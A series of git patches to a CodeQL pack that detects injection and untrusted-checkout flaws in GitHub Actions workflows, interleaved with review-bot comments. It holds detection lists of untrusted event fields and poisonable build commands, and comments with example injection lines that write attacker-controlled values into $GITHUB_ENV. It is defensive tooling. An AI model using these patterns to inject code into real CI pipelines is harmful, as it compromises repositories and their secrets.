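Review bot: `untrustedEventPropertiesDataModel(regexp, _)` is added as a top-level conjunct of the `exists`, so it now also gates the second disjunct (the "github.event is tainted for all triggers" case), which did not depend on the property list before. If the data extension is not loaded or is emptied, GitHubEventJsonSource would yield no sources at all instead of only losing the per-property matches. Consider moving the call next to its only visible use, `normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*")`, in the `@@ -223,7 +79,7 @@` hunk. The second disjunct continues past the end of the hunk, so this assumes it does not use `regexp`.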
@@ -0,0 +1,83 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: untrustedEventPropertiesDataModel + data: + # TITLE + - ["github\\.event\\.issue\\.title", "title"] + - ["github\\.event\\.pull_request\\.title", "title"] + - ["github\\.event\\.discussion\\.title", "title"] + - ["github\\.event\\.pages\\[[0-9]+\\]\\.page_name", "title"] + - ["github\\.event\\.pages\\[[0-9]+\\]\\.title", "title"] + - ["github\\.event\\.workflow_run\\.display_title", "title"] + # URL + - ["github\\.event\\.pull_request\\.head\\.repo\\.homepage", "url"] + # TEXT + - ["github\\.event\\.issue\\.body", "text"] + - ["github\\.event\\.pull_request\\.body", "text"] + - ["github\\.event\\.discussion\\.body", "text"] + - ["github\\.event\\.review\\.body", "text"] + - ["github\\.event\\.comment\\.body", "text"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.message", "text"] + - ["github\\.event\\.head_commit\\.message", "text"] + - ["github\\.event\\.workflow_run\\.head_commit\\.message", "text"] + - ["github\\.event\\.pull_request\\.head\\.repo\\.description", "text"] + - ["github\\.event\\.workflow_run\\.head_repository\\.description", "text"] + - ["github\\.event\\.client_payload\\[[0-9]+\\]", "text"] + - ["github\\.event\\.client_payload", "text"] + # BRANCH + - ["github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "branch"] + - ["github\\.event\\.pull_request\\.head\\.ref", "branch"] + - ["github\\.event\\.workflow_run\\.head_branch", "branch"] + - ["github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", "branch"] + - ["github\\.event\\.merge_group\\.head_ref", "branch"] + # LABEL + - ["github\\.event\\.pull_request\\.head\\.label", "label"] + # EMAIL + - ["github\\.event\\.head_commit\\.author\\.email", "email"] + - ["github\\.event\\.head_commit\\.committer\\.email", "email"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", "email"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", "email"] + - 
["github\\.event\\.merge_group\\.committer\\.email", "email"] + - ["github\\.event\\.workflow_run\\.head_commit\\.author\\.email", "email"] + - ["github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", "email"] + # USERNAME + - ["github\\.event\\.head_commit\\.author\\.name", "username"] + - ["github\\.event\\.head_commit\\.committer\\.name", "username"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", "username"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", "username"] + - ["github\\.event\\.merge_group\\.committer\\.name", "username"] + - ["github\\.event\\.workflow_run\\.head_commit\\.author\\.name", "username"] + - ["github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", "username"] + # PATH + - ["github\\.event\\.workflow\\.path", "path"] + - ["github\\.event\\.workflow_run\\.path", "path"] + - ["github\\.event\\.workflow_run\\.referenced_workflows\\.path", "path"] + # JSON + - ["github", "json"] + - ["github\\.event", "json"] + - ["github\\.event\\.client_payload", "json"] + - ["github\\.event\\.comment", "json"] + - ["github\\.event\\.commits", "json"] + - ["github\\.event\\.discussion", "json"] + - ["github\\.event\\.head_commit", "json"] + - ["github\\.event\\.head_commit\\.author", "json"] + - ["github\\.event\\.head_commit\\.committer", "json"] + - ["github\\.event\\.issue", "json"] + - ["github\\.event\\.merge_group", "json"] + - ["github\\.event\\.merge_group\\.committer", "json"] + - ["github\\.event\\.pull_request", "json"] + - ["github\\.event\\.pull_request\\.head", "json"] + - ["github\\.event\\.pull_request\\.head\\.repo", "json"] + - ["github\\.event\\.pages", "json"] + - ["github\\.event\\.review", "json"] + - ["github\\.event\\.workflow", "json"] + - ["github\\.event\\.workflow_run", "json"] + - ["github\\.event\\.workflow_run\\.head_branch", "json"] + - ["github\\.event\\.workflow_run\\.head_commit", "json"] + - ["github\\.event\\.workflow_run\\.head_commit\\.author", "json"] + - 
["github\\.event\\.workflow_run\\.head_commit\\.committer", "json"] + - ["github\\.event\\.workflow_run\\.head_repository", "json"] + - ["github\\.event\\.workflow_run\\.pull_requests", "json"] + + From 682236e432e97cef2d7af4b6892d2c2ba7887c08 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:25:55 +0200 Subject: [PATCH 0360/1267] New poisonable steps --- ql/lib/ext/config/poisonable_steps.yml | 39 +++++++++++++++----------- 1 file changed, 23 insertions(+), 16 deletions(-) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 9a9af08872c..9ad251007e5 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -17,29 +17,36 @@ extensions: # source: https://boostsecurityio.github.io/lotp/ data: - ["ant "] - - ["bundle install"] - - ["bundle exec "] + - ["bundle "] - ["cargo "] + - ["checkov "] + - ["eslint "] - ["go generate"] + - ["go run"] - ["gomplate "] - ["gradle "] - - ["java -jar "] + - ["java -jar"] - ["make "] - - ["mkdocs build"] - - ["msbuild "] - - ["mvn "] - - ["npm i(nstall)?(\\b|$)"] - - ["npm run "] - - ["npm ci(\\b|$)"] - - ["pip install -r "] + - ["mkdocs"] + - ["msbuild"] + - ["mvn"] + - ["mypy"] + - ["npm i(nstall)?"] + - ["npm run"] + - ["npm ci"] + - ["pre-commit"] + - ["prettier"] + - ["pip install -r"] - ["pip install --requirement"] - - ["poetry install"] - - ["poetry run"] - - ["pre-commit run"] - - ["pre-commit install"] + - ["poetry"] + - ["pylint"] - ["pytest"] - - ["terraform plan"] - - ["terraform apply"] + - ["rake "] + - ["rails db:create"] + - ["rails assets:precompile"] + - ["rubocop "] + - ["terraform "] + - ["tflint"] - ["yarn "] - addsTo: pack: github/actions-all From 04c4cedb41a55c7455a021ae69835c680576e717 Mon Sep 17 00:00:00 2001 
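Review bot: The per-category comments that explained which characters each kind of value can carry were not carried over from the removed QL predicates, for example `// All characters must be either a hyphen (-) or alphanumeric` on `usernameEvent()` and the branch-name rules on `branchEvent()`. Those constraints are what a triager needs to judge how far a `username`, `label` or `branch` source can be abused, so I would keep them next to the section headers, e.g. `# USERNAME: all characters must be either a hyphen (-) or alphanumeric`. A short header comment would also help people extending the file: it should say that the first column is a regular expression, the second is the source kind, and that `json` rows are skipped by GitHubEventCtxSource (`not flag = "json"`).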
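Review bot: Dropping the `(\\b|$)` suffix from the npm patterns in poisonable_steps.yml widens them beyond the install commands: `npm i(nstall)?` now also matches `npm init` or `npm info`, and `npm ci` matches any longer word starting with `ci`. The trailing-space convention is also applied unevenly in the new list (`rake `, `rubocop ` and `terraform ` keep it; `mvn`, `mypy`, `poetry` and `tflint` do not), so the latter match as prefixes of longer words. Unless the predicate consuming `poisonableCommandsDataModel` adds its own boundary (not visible here), I would keep `- ["npm i(nstall)?(\\b|$)"]` and `- ["npm ci(\\b|$)"]` and use one delimiter convention for the rest.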
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:26:04 +0200 Subject: [PATCH 0361/1267] New code injection sink --- ql/lib/ext/manual/mikefarah_yq.model.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 ql/lib/ext/manual/mikefarah_yq.model.yml diff --git a/ql/lib/ext/manual/mikefarah_yq.model.yml b/ql/lib/ext/manual/mikefarah_yq.model.yml new file mode 100644 index 00000000000..35aecbdd968 --- /dev/null +++ b/ql/lib/ext/manual/mikefarah_yq.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["mikefarah/yq", "*", "input.cmd", "code-injection", "manual"] + From 31fe5952dc61f9cbbb59b2036c6ca8fff9b7616c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:32:03 +0200 Subject: [PATCH 0362/1267] New poisonable steps --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 9ad251007e5..11f17ae2623 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -10,6 +10,7 @@ extensions: - ["bridgecrewio/checkov-action"] - ["ruby/setup-ruby"] - ["actions/jekyll-build-pages"] + - ["qcastel/github-actions-maven/actions/maven"] - addsTo: pack: github/actions-all extensible: poisonableCommandsDataModel From c57e4929cb01c2c291c76ef75c58012faabc8acb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:32:21 +0200 Subject: [PATCH 0363/1267] New code injection sink --- ql/lib/ext/manual/devorbitus_yq-action-output.model.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 ql/lib/ext/manual/devorbitus_yq-action-output.model.yml diff --git a/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml new file mode 100644 index 00000000000..412db371965 --- /dev/null 
+++ b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["devorbitus/yq-action-output", "*", "input.cmd", "code-injection", "manual"] + From b64f53e03e83073984e309301ffdaefbdc7db806 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:33:08 +0200 Subject: [PATCH 0364/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3c37e64b856..30120f7d321 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.7 +version: 0.1.8 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f7464c78452..dad05ff4af3 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.7 +version: 0.1.8 groups: [actions, queries] suites: codeql-suites extractor: javascript From effa1e135670cfdaa01a83d42a156be6ff7eff87 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 22:53:20 +0200 Subject: [PATCH 0365/1267] Move ControlChecks to its own file --- .../codeql/actions/security/ControlChecks.qll | 65 +++++++++++++++++++ .../security/UntrustedCheckoutQuery.qll | 63 ------------------ .../Security/CWE-285/ImproperAccessControl.ql | 1 + .../UntrustedCheckoutTOCTOUCritical.ql | 1 + .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 1 + .../CWE-829/UntrustedCheckoutCritical.ql | 1 + .../Security/CWE-829/UntrustedCheckoutHigh.ql | 1 + .../CWE-829/UntrustedCheckoutMedium.ql | 1 + 8 files changed, 71 insertions(+), 63 deletions(-) create mode 100644 ql/lib/codeql/actions/security/ControlChecks.qll 
diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll new file mode 100644 index 00000000000..fdafda1fc27 --- /dev/null +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
@@ -0,0 +1,65 @@
+import actions
+
+/** An If node that contains an actor, user or label check */
+abstract class ControlCheck extends If {
+ predicate dominates(Step step) {
+ step.getIf() = this or
+ step.getEnclosingJob().getIf() = this or
+ step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or
+ step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this
+ }
+}
+
+class LabelControlCheck extends ControlCheck {
+ LabelControlCheck() {
+ // eg: contains(github.event.pull_request.labels.*.name, 'safe to test')
+ // eg: github.event.label.name == 'safe to test'
+ exists(
+ normalizeExpr(this.getCondition())
+ .regexpFind([
+ "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b"
+ ], _, _)
+ )
+ }
+}
+
+class ActorControlCheck extends ControlCheck {
+ ActorControlCheck() {
+ // eg: github.actor == 'dependabot[bot]'
+ // eg: github.triggering_actor == 'CI Agent'
+ // eg: github.event.pull_request.user.login == 'mybot'
+ exists(
+ normalizeExpr(this.getCondition())
+ .regexpFind([
+ "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b",
+ "\\bgithub\\.event\\.comment\\.user\\.login\\b",
+ "\\bgithub\\.event\\.pull_request\\.user\\.login\\b",
+ ], _, _)
+ )
+ }
+}
+
+class RepositoryControlCheck extends ControlCheck {
+ RepositoryControlCheck() {
+ // eg: github.repository == 'test/foo'
+ exists(
+ normalizeExpr(this.getCondition())
+ .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _)
+ )
+ }
+}
+
+class AssociationControlCheck extends ControlCheck {
+ AssociationControlCheck() {
+ // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association)
+ exists(
+ normalizeExpr(this.getCondition())
+ .regexpFind([
+ "\\bgithub\\.event\\.comment\\.author_association\\b",
+ "\\bgithub\\.event\\.issue\\.author_association\\b",
+ "\\bgithub\\.event\\.pull_request\\.author_association\\b",
+ ], _, _)
+ )
+ }
+}
+
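Review bot: `ControlCheck.dominates` treats an `if:` on a step of a needed job as guarding the current step (`getANeededJob().(LocalJob).getAStep().getIf() = this`), but a step-level condition only skips that one step; the needed job can still succeed and the dependent job still run. That could make the checkout queries regard a step as protected when it is not, so I would drop that disjunct or document why it is safe. Separately, the subclasses only `regexpFind` a context name such as `github.actor` anywhere in the condition, so a negated or `||`-combined comparison also counts as a check; a QLDoc line on each class stating that limitation would be worth adding. This commit only moves the code, so both points predate it.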
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 90b0a74d0ec..fcccc5d8a14 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
@@ -233,66 +233,3 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { ) } } - -/** An If node that contains an actor, user or label check */ -abstract class ControlCheck extends If { - predicate dominates(Step step) { - step.getIf() = this or - step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this - } -} - -class LabelControlCheck extends ControlCheck { - LabelControlCheck() { - // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') - // eg: github.event.label.name == 'safe to test' - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" - ], _, _) - ) - } -} - -class ActorControlCheck extends ControlCheck { - ActorControlCheck() { - // eg: github.actor == 'dependabot[bot]' - // eg: github.triggering_actor == 'CI Agent' - // eg: github.event.pull_request.user.login == 'mybot' - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", - "\\bgithub\\.event\\.comment\\.user\\.login\\b", - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", - ], _, _) - ) - } -} - -class RepositoryControlCheck extends ControlCheck { - RepositoryControlCheck() { - // eg: github.repository == 'test/foo' - exists( - normalizeExpr(this.getCondition()) - .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _) - ) - } -} - -class AssociationControlCheck extends ControlCheck { - AssociationControlCheck() { - // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.comment\\.author_association\\b", - "\\bgithub\\.event\\.issue\\.author_association\\b", - "\\bgithub\\.event\\.pull_request\\.author_association\\b", - ], _, _) - ) 
- } -} diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 88ac3cee04d..16ae5c5fe9b 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -12,6 +12,7 @@ */ import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.ControlChecks from LocalJob job, LabelControlCheck check, MutableRefCheckoutStep checkout, Event event where diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index ff9148ab583..3a049f67dea 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from ControlCheck check, MutableRefCheckoutStep checkout where diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index ca1b855c6ec..b9a1e4c6301 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from ControlCheck check, MutableRefCheckoutStep checkout where diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 9f7f3fd8cee..3a87b30be97 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql 
@@ -16,6 +16,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 980560dac9a..cb2f1cdaf95 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -16,6 +16,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from LocalJob j, PRHeadCheckoutStep checkout where diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 89d2e741306..3edde8dcf54 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -16,6 +16,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from LocalJob j, PRHeadCheckoutStep checkout where From a9ea9a1f8a7e781e072de04ab682db08111daa6a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 22:53:32 +0200 Subject: [PATCH 0366/1267] Update expected test files --- .../Security/CWE-829/UntrustedCheckoutCritical.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 57efc8af35d..5f4ba7a7b98 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -313,6 +313,7 @@ edges | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | From 40a6f3bbee8348d2b2f0e66b510236bcd91b1ec7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 22:53:55 +0200 Subject: [PATCH 0367/1267] Make EnvVar and Path injection equivalent --- .../security/EnvPathInjectionQuery.qll | 5 ++- .../actions/security/EnvVarInjectionQuery.qll | 39 ++++++++++++------- 2 files changed, 29 insertions(+), 15 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index cd049cccf4e..453966f0101 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll 
+++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -15,7 +15,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { writeToGitHubPath(run, value) and // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) value - .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) + .regexpMatch(["\\$\\(", "`"] + + ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) ) } } @@ -31,7 +32,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, Expression expr, string var_name, string value | - this.asExpr().getInScopeEnvVarExpr(var_name) = expr and + run.getInScopeEnvVarExpr(var_name) = expr and run.getScriptScalar() = this.asExpr() and writeToGitHubPath(run, value) and ( diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index a692c6e5874..a78963086e1 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -7,18 +7,6 @@ import codeql.actions.DataFlow abstract class EnvVarInjectionSink extends DataFlow::Node { } -class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { - EnvVarInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string var_name, string content, string value | - expr = run.getInScopeEnvVarExpr(var_name) and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and - run.getScriptScalar() = this.asExpr() and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - ) - } -} - class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | 
@@ -28,7 +16,32 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { extractVariableAndValue(content, _, value) and // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) value - .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) + .regexpMatch(["\\$\\(", "`"] + + ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) + ) + } +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "FOO=$BODY" >> $GITHUB_ENV + */ +class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { + EnvVarInjectionFromEnvVarSink() { + exists(Run run, Expression expr, string var_name, string content, string value | + run.getInScopeEnvVarExpr(var_name) = expr and + run.getScriptScalar() = this.asExpr() and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) ) } } From a485528ebe2eb2f0ca7be747f38ac559edc4fb89 Mon Sep 17 00:00:00 2001 
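Review bot: The new `$(echo …)` branch, `value.matches("$(echo %") and value.indexOf(var_name) > 0`, tests for the variable name as a bare substring, so a variable called `ID` is considered used by `$(echo $PR_ID)` or by any text containing those letters. The `"%$" + ["", "{", "ENV{"] + var_name + "%"` pattern is similarly loose on the right-hand side (`$BODY` also matches `$BODY_LEN`). A boundary-aware test such as `value.regexpMatch(".*\\$(\\{|ENV\\{)?" + var_name + "\\b.*")` would cover both branches, assuming variable names contain no regex metacharacters. The same two conditions are repeated in `envToRunFlow` in the later FlowSteps.qll hunk (`@@ -23,6 +23,60 @@`).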
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 28 Jun 2024 12:31:43 +0200 Subject: [PATCH 0368/1267] Refactor bash script parsing to improve coverage of env var injection --- ql/lib/codeql/actions/Helper.qll | 11 +++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 92 +++++++++++++++---- .../security/EnvPathInjectionQuery.qll | 27 +++--- .../actions/security/EnvVarInjectionQuery.qll | 29 +++--- .../actions/security/PoisonableSteps.qll | 16 ++-- ql/lib/ext/config/poisonable_steps.yml | 12 +-- .../CWE-077/.github/workflows/test6.yml | 28 ++++++ .../CWE-077/EnvVarInjectionCritical.expected | 12 +++ .../CWE-077/EnvVarInjectionMedium.expected | 9 ++ 9 files changed, 172 insertions(+), 64 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 401ba89eca7..72dc7bf1687 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -235,3 +235,14 @@ predicate inNonPrivilegedJob(AstNode node) { not j.isPrivilegedExternallyTriggerable() ) } + +bindingset[snippet] +predicate outputsPartialFileContent(string snippet) { + // e.g. + // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV + // echo "FOO=$(> $GITHUB_ENV + // yq '.foo' foo.yml >> $GITHUB_PATH + // cat foo.txt >> $GITHUB_PATH + snippet + .regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + ".*"]) +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 4f4d80cc11b..caa09e9c7e2 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
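Review bot: The two alternatives in `outputsPartialFileContent` are anchored differently: because `regexpMatch` has to match the whole string, the redirect form only matches when `snippet` begins with the command substitution, while the `cat`/`jq`/`yq` form is wrapped in `.*` on both sides. A value with anything in front of the substitution (a quote, a prefix, a second variable) would be missed by the first alternative; prefixing it with `.*` would make the two consistent. The predicate also has no QLDoc, and the list includes `ls`, which prints file names rather than content. A QLDoc comment saying that names taken from an untrusted artifact are deliberately treated like content would show that this is intentional.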
